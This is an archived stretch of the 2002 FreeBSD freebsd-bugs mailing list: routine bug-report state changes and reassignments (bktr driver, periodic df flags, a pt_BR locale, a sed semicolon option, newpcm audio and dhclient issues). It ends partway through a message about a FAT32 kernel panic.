majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 12:58:50 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1E5C837B406; Tue, 20 Aug 2002 12:58:43 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4F3B343E84; Tue, 20 Aug 2002 12:58:42 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (smmsp@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KJwfJe029911; Tue, 20 Aug 2002 12:58:42 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KJCZ1Q010857; Tue, 20 Aug 2002 12:12:35 -0700 (PDT) Date: Tue, 20 Aug 2002 12:12:35 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201912.g7KJCZ1Q010857@freefall.freebsd.org> To: juha.o.ylitalo@kolumbus.fi, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/37310: add inode information into daily_status_disks df printout Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: add inode information into daily_status_disks df printout State-Changed-From-To: open->closed State-Changed-By: johan State-Changed-When: Tue Aug 20 12:07:55 PDT 2002 State-Changed-Why: You can easy make this change for you own system without forcing everyone to agree with you. Just do # echo 'daily_status_disks_df_flags="-ik -t nonfs"' >> /etc/periodic.conf as root. see periodic.conf(5) for more infomation. http://www.freebsd.org/cgi/query-pr.cgi?pr=37310 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 12:59: 3 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2D8E237B408; Tue, 20 Aug 2002 12:58:43 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1289443E6A; Tue, 20 Aug 2002 12:58:42 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (smmsp@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KJwfJc029911; Tue, 20 Aug 2002 12:58:41 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KJG7kg012223; Tue, 20 Aug 2002 12:16:07 -0700 (PDT) Date: Tue, 20 Aug 2002 12:16:07 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201916.g7KJG7kg012223@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-standards@FreeBSD.org Subject: Re: bin/37224: make: $< only set for implicit rules Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: make: $< only set for implicit rules Responsible-Changed-From-To: freebsd-bugs->freebsd-standards Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 12:15:12 PDT 2002 Responsible-Changed-Why: Lets pass this by -standards. They know if it should be closed or not. http://www.freebsd.org/cgi/query-pr.cgi?pr=37224 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 13: 2:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D8B9F37B400; Tue, 20 Aug 2002 13:02:13 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 88A0943E65; Tue, 20 Aug 2002 13:02:13 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KK2DJU031663; Tue, 20 Aug 2002 13:02:13 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KK2CQD031653; Tue, 20 Aug 2002 13:02:12 -0700 (PDT) Date: Tue, 20 Aug 2002 13:02:12 -0700 (PDT) From: Johan Karlsson Message-Id: <200208202002.g7KK2CQD031653@freefall.freebsd.org> To: pan@panix.ecof.org.br, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, ache@FreeBSD.org Subject: Re: misc/39354: where is the Brazilian portuguese locale? pt_BR Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: where is the Brazilian portuguese locale? pt_BR State-Changed-From-To: feedback->open State-Changed-By: johan State-Changed-When: Tue Aug 20 12:59:12 PDT 2002 State-Changed-Why: We got the two files needed. Responsible-Changed-From-To: freebsd-bugs->ache Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 12:59:12 PDT 2002 Responsible-Changed-Why: Andrey, can you please have a look at this and maybe commit the files if they are ok. http://www.freebsd.org/cgi/query-pr.cgi?pr=39354 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 13:32:48 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1194337B400; Tue, 20 Aug 2002 13:32:46 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9172143E3B; Tue, 20 Aug 2002 13:32:45 -0700 (PDT) (envelope-from keramida@FreeBSD.org) Received: from freefall.freebsd.org (keramida@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KKWjJU048705; Tue, 20 Aug 2002 13:32:45 -0700 (PDT) (envelope-from keramida@freefall.freebsd.org) Received: (from keramida@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KKWjbG048701; Tue, 20 Aug 2002 13:32:45 -0700 (PDT) Date: Tue, 20 Aug 2002 13:32:45 -0700 (PDT) From: Giorgos Keramidas Message-Id: <200208202032.g7KKWjbG048701@freefall.freebsd.org> To: keramida@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/41220: [PATCH] Minor sk driver enhancements Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] Minor sk driver enhancements Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: keramida Responsible-Changed-When: Tue Aug 20 13:30:59 PDT 2002 Responsible-Changed-Why: Refile this under a proper category. http://www.freebsd.org/cgi/query-pr.cgi?pr=41220 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 14: 1:11 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 96DB637B400; Tue, 20 Aug 2002 14:01:09 -0700 (PDT) Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8ADCB43E6E; Tue, 20 Aug 2002 14:01:08 -0700 (PDT) (envelope-from ache@pobrecita.freebsd.ru) Received: from pobrecita.freebsd.ru (ache@localhost [127.0.0.1]) by nagual.pp.ru (8.12.5/8.12.5) with ESMTP id g7KL093n001273; Wed, 21 Aug 2002 01:01:05 +0400 (MSD) (envelope-from ache@pobrecita.freebsd.ru) Received: (from ache@localhost) by pobrecita.freebsd.ru (8.12.5/8.12.5/Submit) id g7KL08sd001272; Wed, 21 Aug 2002 01:00:08 +0400 (MSD) (envelope-from ache) Date: Wed, 21 Aug 2002 01:00:08 +0400 From: "Andrey A. Chernov" To: Johan Karlsson Cc: pan@panix.ecof.org.br, freebsd-bugs@FreeBSD.org Subject: Re: misc/39354: where is the Brazilian portuguese locale? pt_BR Message-ID: <20020820210007.GA1157@nagual.pp.ru> References: <200208202002.g7KK2CQD031653@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200208202002.g7KK2CQD031653@freefall.freebsd.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Aug 20, 2002 at 13:02:12 -0700, Johan Karlsson wrote: > Responsible-Changed-Why: > Andrey, can you please have a look at this > and maybe commit the files if they are ok. Please submit files needed in proper format, i.e. without standard comments stripped out and uuencoded to preserve 8bit and trailing blanks. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 14: 5:28 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D83BA37B400; Tue, 20 Aug 2002 14:05:26 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 862ED43E72; Tue, 20 Aug 2002 14:05:26 -0700 (PDT) (envelope-from keramida@FreeBSD.org) Received: from freefall.freebsd.org (keramida@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KL5QJU059391; Tue, 20 Aug 2002 14:05:26 -0700 (PDT) (envelope-from keramida@freefall.freebsd.org) Received: (from keramida@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KL5QhW059344; Tue, 20 Aug 2002 14:05:26 -0700 (PDT) Date: Tue, 20 Aug 2002 14:05:26 -0700 (PDT) From: Giorgos Keramidas Message-Id: <200208202105.g7KL5QhW059344@freefall.freebsd.org> To: tjr@FreeBSD.ORG, keramida@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/41217: Re: new sed -c option to allow ; as a separator for b, t and : functions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Re: new sed -c option to allow ; as a separator for b, t and : functions State-Changed-From-To: open->closed State-Changed-By: keramida State-Changed-When: Tue Aug 20 14:04:23 PDT 2002 State-Changed-Why: Followup to bin/41159 misfiled as a new PR. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: keramida Responsible-Changed-When: Tue Aug 20 14:04:23 PDT 2002 Responsible-Changed-Why: http://www.freebsd.org/cgi/query-pr.cgi?pr=41217 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 14:10: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4338737B400 for ; Tue, 20 Aug 2002 14:10:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id F2ED243E3B for ; Tue, 20 Aug 2002 14:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KLA3JU064036 for ; Tue, 20 Aug 2002 14:10:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KLA3cO064035; Tue, 20 Aug 2002 14:10:03 -0700 (PDT) Date: Tue, 20 Aug 2002 14:10:03 -0700 (PDT) Message-Id: <200208202110.g7KLA3cO064035@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Giorgos Keramidas Subject: Re: bin/41159: new sed -c option to allow ; as a separator for b, t and : functions Reply-To: Giorgos Keramidas Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/41159; it has been noted by GNATS. From: Giorgos Keramidas To: Cyrille Lefevre Cc: bug-followup@FreeBSD.org, "Tim J. Robbins" Subject: Re: bin/41159: new sed -c option to allow ; as a separator for b, t and : functions Date: Wed, 21 Aug 2002 00:04:10 +0300 Adding to audit trail: : : Message-Id: <20020801122653.A4231@dilbert.robbins.dropbear.id.au> : Date: Thu, 1 Aug 2002 12:26:53 +1000 : From: Tim Robbins : Subject: Re: new sed -c option to allow ; as a separator for b, t and : functions : : On Tue, Jul 30, 2002 at 02:40:33PM +0200, Cyrille Lefevre wrote: : > the current sed implementation can't handle the ; separator for : > b, t and : functions. this patch set add a new -c (compat) option : > to allow sed to parse such constructions. maybe -C is better then -c ? : : If I understand SUSv3 correctly, file names or label names can contain : semicolons: : : 32406 Command verbs other than {, a, b, c, i, r, t, w, :, and # can be : followed by a semicolon, optional : 32407 s, and another command verb. However, when the s command verb : is used with the w : 32408 flag, following it with another command in this manner produces : undefined results. : : GNU sed, which by default accepts semicolons after (at least) the : and t : commands does not strictly conform. I'd rather that our sed was by default : as close as possible to what the standard requires, so we probably do need : a command line option like you suggested. : : I think -g would be a better choice (similar to m4's -g option) to : emphasise the fact that accepting semicolons after these commands is a GNU : extension, and possibly adding more GNU compatibility features if : they're needed/useful. BSD, 7th Edition and System V all behave the same : way, and treat semicolons as part of the label/filename. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 14:17:34 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5E31637B400; Tue, 20 Aug 2002 14:17:33 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 10D0F43E84; Tue, 20 Aug 2002 14:17:33 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KLHWJU066156; Tue, 20 Aug 2002 14:17:32 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KLHWhu066152; Tue, 20 Aug 2002 14:17:32 -0700 (PDT) Date: Tue, 20 Aug 2002 14:17:32 -0700 (PDT) From: Johan Karlsson Message-Id: <200208202117.g7KLHWhu066152@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, roger@FreeBSD.org Subject: Re: kern/33715: bktr driver in full frame, continuous capture dosn't send interupts Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: bktr driver in full frame, continuous capture dosn't send interupts Responsible-Changed-From-To: freebsd-bugs->roger Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 14:17:08 PDT 2002 Responsible-Changed-Why: Over to bktr maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=33715 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 14:18:23 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A8BF437B400; Tue, 20 Aug 2002 14:18:22 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 598FB43E3B; Tue, 20 Aug 2002 14:18:22 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KLIMJU066395; Tue, 20 Aug 2002 14:18:22 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KLIM55066391; Tue, 20 Aug 2002 14:18:22 -0700 (PDT) Date: Tue, 20 Aug 2002 14:18:22 -0700 (PDT) From: Johan Karlsson Message-Id: <200208202118.g7KLIM55066391@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, roger@FreeBSD.org Subject: Re: kern/36413: the bktr driver tries to destroy device aliases and panics the kernel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: the bktr driver tries to destroy device aliases and panics the kernel Responsible-Changed-From-To: freebsd-bugs->roger Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 14:17:56 PDT 2002 Responsible-Changed-Why: Over to bktr maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=36413 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 14:19: 5 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9B2C737B400; Tue, 20 Aug 2002 14:19:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3ED3743E75; Tue, 20 Aug 2002 14:19:03 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KLJ3JU066542; Tue, 20 Aug 2002 14:19:03 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KLJ3uK066537; Tue, 20 Aug 2002 14:19:03 -0700 (PDT) Date: Tue, 20 Aug 2002 14:19:03 -0700 (PDT) From: Johan Karlsson Message-Id: <200208202119.g7KLJ3uK066537@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, roger@FreeBSD.org Subject: Re: kern/36415: the bktr driver incorrectly handles the setting of frame rates Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: the bktr driver incorrectly handles the setting of frame rates Responsible-Changed-From-To: freebsd-bugs->roger Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 14:18:42 PDT 2002 Responsible-Changed-Why: Over to bktr maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=36415 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 14:20:19 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A96C737B400; Tue, 20 Aug 2002 14:20:16 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5DB9443E3B; Tue, 20 Aug 2002 14:20:16 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KLKGJU066767; Tue, 20 Aug 2002 14:20:16 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KLKGFK066763; Tue, 20 Aug 2002 14:20:16 -0700 (PDT) Date: Tue, 20 Aug 2002 14:20:16 -0700 (PDT) From: Johan Karlsson Message-Id: <200208202120.g7KLKGFK066763@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, roger@FreeBSD.org Subject: Re: kern/37326: smbus/bktr crash when omitting "device iicsmb" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: smbus/bktr crash when omitting "device iicsmb" Responsible-Changed-From-To: freebsd-bugs->roger Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 14:19:57 PDT 2002 Responsible-Changed-Why: Over to bktr maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=37326 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 14:22:25 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EEC6B37B400; Tue, 20 Aug 2002 14:22:23 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A189243E6E; Tue, 20 Aug 2002 14:22:23 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KLMNJU068127; Tue, 20 Aug 2002 14:22:23 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KLMNUb068123; Tue, 20 Aug 2002 14:22:23 -0700 (PDT) Date: Tue, 20 Aug 2002 14:22:23 -0700 (PDT) From: Johan Karlsson Message-Id: <200208202122.g7KLMNUb068123@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, roger@FreeBSD.org Subject: Re: kern/38883: 'kldload bktr' stuck in state swwrt, exercising the disk Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: 'kldload bktr' stuck in state swwrt, exercising the disk Responsible-Changed-From-To: freebsd-bugs->roger Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 14:20:53 PDT 2002 Responsible-Changed-Why: Over to bktr maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=38883 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 14:22:42 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9219937B400 for ; Tue, 20 Aug 2002 14:22:39 -0700 (PDT) Received: from got.wedgie.org (dsl092-146-207.wdc1.dsl.speakeasy.net [66.92.146.207]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3B56343E77 for ; Tue, 20 Aug 2002 14:22:39 -0700 (PDT) (envelope-from bjohnson@got.wedgie.org) Received: by got.wedgie.org (Postfix, from userid 1010) id B8C4CD927; Tue, 20 Aug 2002 17:25:53 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by got.wedgie.org (Postfix) with ESMTP id 9CF3F9B52 for ; Tue, 20 Aug 2002 17:25:53 -0400 (EDT) Date: Tue, 20 Aug 2002 17:25:53 -0400 (EDT) From: Brad Johnson To: freebsd-bugs@freebsd.org Subject: Re: kern/31398: newpcm does not play back the tail of sound Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi... Is anyone still looking at this bug? It's been open forever and now that it affects me... :-) I have: device pcm compiled into my kernel and sound works for the most part, but I'm still experiencing the problem where the last .5 or so seconds of sound gets cut off. Has anyone at least figured out what's causing this or come up with a workaround for this? By the way I'm running 4.6-STABLE FreeBSD 4.6-STABLE #2: Mon Aug 12 12:28:01 GMT 2002 Thanks, Brad Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 14:24:31 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5CEDC37B400 for ; Tue, 20 Aug 2002 14:24:29 -0700 (PDT) Received: from franka.aracnet.com (franka.aracnet.com [216.99.193.44]) by mx1.FreeBSD.org (Postfix) with ESMTP id 04C9C43E6A for ; Tue, 20 Aug 2002 14:24:29 -0700 (PDT) (envelope-from henryt_NOSPAM@aracnet.com) Received: from aracnet.com (216-99-192-43.dial.spiritone.com [216.99.192.43]) (authenticated bits=0) by franka.aracnet.com (8.12.5/8.12.5) with ESMTP id g7KLFRO1027540; Tue, 20 Aug 2002 14:15:33 -0700 Message-ID: <3D625168.6030609@aracnet.com> Date: Tue, 20 Aug 2002 14:25:44 +0000 From: henry tieman User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc3) Gecko/20020607 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.ORG Subject: problem with base dhclient in FreeBSD-4.6 RELEASE Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I really like using FreeBSD but occasionally there is a problem. I keep the base configuration on my laptop pretty clean - infact I use it as a scratch machine. I have been using DHCP from my server machine for a while so I know the configuration works. When I installed FreeBSD 4.6 from CDs on my laptop I just used dhcp for the connection. But dhclient failed to create a /etc/resolv.conf file and so network names failed. I know what to look for to see if networking is functioning. But I'm not familure enough with dhclient to know what to change to fix this problem. It seems that dhclient-script isn't being run, the IP number is being assigned and that is where I decided to try something else. I installed the dhclient from the packages. It seems to work much better. If you want to have the configuration file for the dhcp server I can send it to you. henry -- Henry Tieman You may have to remove the _NOSPAM to reply to this message. Objects in the mirror are closer than they appear. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 15:40:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9622237B405 for ; Tue, 20 Aug 2002 15:40:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 54C2B43E3B for ; Tue, 20 Aug 2002 15:40:08 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KMe7JU089716 for ; Tue, 20 Aug 2002 15:40:07 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KMe7aK089715; Tue, 20 Aug 2002 15:40:07 -0700 (PDT) Date: Tue, 20 Aug 2002 15:40:07 -0700 (PDT) Message-Id: <200208202240.g7KMe7aK089715@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Simon L. Nielsen" Subject: Re: kern/37889: kernel panic when writing to a FAT32 partition Reply-To: "Simon L. Nielsen" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/37889; it has been noted by GNATS. From: "Simon L. Nielsen" To: hiten@uk.FreeBSD.org Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: kern/37889: kernel panic when writing to a FAT32 partition Date: Wed, 21 Aug 2002 00:39:35 +0200 On 2002.08.14 00:40:03 +0000, Hiten 